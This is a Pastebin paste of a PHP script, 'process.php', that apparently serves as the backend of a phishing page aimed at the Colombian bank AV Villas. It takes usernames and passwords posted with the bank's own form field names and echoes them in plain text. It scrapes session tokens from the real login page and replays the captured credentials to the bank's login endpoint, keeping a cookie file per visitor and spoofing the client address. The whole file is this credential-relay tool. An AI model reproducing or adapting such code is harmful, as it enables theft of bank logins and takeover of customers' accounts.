daily pastebin goal
19%
SHARE
TWEET

process.php

a guest Sep 21st, 2018 177 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. set_time_limit(0);
  3. $_SERVER['REMOTE_ADDR'] = '127.0.3' . mt_rand();
  4.  
  5.  
  6. //if($_POST){
  7.  
  8. echo '<pre>';print_r($_POST);
  9. echo '</pre>';
  10.    
  11.     require_once('xtCurl.php');
  12.  
  13.     $user = $_POST['viewns_Z7_2GDG0A41LGN4C0A55BKUGT18P2_:usuInput'];
  14.     $pass = $_POST['viewns_Z7_2GDG0A41LGN4C0A55BKUGT18P2_:xPassInput'];
  15.  
  16.     $xtCurl = new xtCurl();
  17.  
  18.     //Paso 1
  19.     $config = array(
  20.         'url' => 'https://www.avvillas.com.co/wps/portal/avvillas/banco/login/',
  21.         'referer' => 'https://www.avvillas.com.co/wps/portal/avvillas/banco/login/',
  22.         'type' => 'GET',
  23.         'user_agent' => $_SERVER['HTTP_USER_AGENT'],
  24.         'cookie_name' => 'cookie_' . $_SERVER['REMOTE_ADDR'] . '.txt'
  25.     );
  26.     $mainSource = $xtCurl->httpRequest($config);
  27.     preg_match("/name=\"javax.faces.encodedURL\" value=\"(.*?)\/p0\//", $mainSource, $location);
  28.     $loginUrl = 'https://www.avvillas.com.co' . $location[1] . '/';
  29.  
  30.     preg_match("/action=\"(.*?)\" enctype=\"application\/x\-www\-form\-urlencoded\" class=\"signup\-form\">/", $mainSource, $formUrl);
  31.     preg_match("/class=\"signup-form\"><input type=\"hidden\" name=\"javax.faces.encodedURL\" value=\"(.*?)\" \/>/", $mainSource, $javaxFacesEncodeUrl);
  32.     preg_match("/SUBMIT\" value=\"1\" \/><input type=\"hidden\" name=\"javax.faces.ViewState\" id=\"javax.faces.ViewState\" value=\"(.*?)\" \/>/", $mainSource, $javaxFacesViewState);
  33.  
  34.     //Paso 3
  35.     $data = '';
  36.     echo 'User: ' . $user .' <br/> Pass: ' . $pass . '<Br />';
  37.     //$postData = file_get_contents('php://input');
  38.     foreach($_POST as $id => $value){
  39.         $id = str_replace('javax_faces_', 'javax.faces.', $id);
  40.  
  41.         //if($id != 'viewns_Z7_2GDG0A41LGN4C0A55BKUGT18P2_:passInput')
  42.             //$value  = urlencode($value);
  43.  
  44.         $data .= $id . '=' . $value . '&';
  45.     }
  46.     $data = substr($data, 0, strlen($data) - 1);
  47.     echo 'Longitud: ' . strlen($data) . '<br />';
  48.     $postData = $data;
  49.     echo '<textarea rows="10" cols="200" style="font-size:13px;">' . $postData . '</textarea>';
  50.    
  51.     $loginUrlPost = 'https://www.avvillas.com.co' . $formUrl[1];
  52.  
  53.     //$loginUrlPost = explode('p0/IZ', $javaxFacesEncodeUrl[1]);
  54.     //$loginUrlPost = 'https://www.avvillas.com.co' . $loginUrlPost[0];
  55.     $config = array(
  56.         'url' => $loginUrlPost,
  57.         'referer' => $loginUrl,
  58.         'type' => 'POST',
  59.         'user_agent' => $_SERVER['HTTP_USER_AGENT'],
  60.         'form_data' => $postData,
  61.         'cookie_name' => 'cookie_' . $_SERVER['REMOTE_ADDR'] . '.txt'
  62.     );
  63.     $login = $xtCurl->httpRequest($config);
  64.     echo 'POST:' . $_POST['javax_faces_encodedURL'] .'<Br />';
  65.     echo 'URL: ' . $loginUrlPost . '<br />';
  66.     echo 'Referer:' . $loginUrl .'<Br />';
  67.     echo '<br /><textarea rows="20" cols="200">' . $login . '</textarea>';
  68. /*
  69.     $config = array(
  70.         'referer' => 'https://www.avvillas.com.co/wps/portal/avvillas/banco/home-logueado#Z7_2GDG0A41LGN4C0A55BKUGT18P2',
  71.         'type' => 'GET',
  72.         'url' => 'https://www.avvillas.com.co/wps/portal/avvillas/banco/login/',
  73.         'user_agent' => $_SERVER['HTTP_USER_AGENT'],
  74.         'cookie_name' => 'cookie_' . $_SERVER['REMOTE_ADDR'] . '.txt'
  75.     );
  76.     $login = $xtCurl->httpRequest($config);
  77.     echo '<textarea rows="5" cols="200">' . $login . '</textarea>';*/
  78.  
  79. //}
  80. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top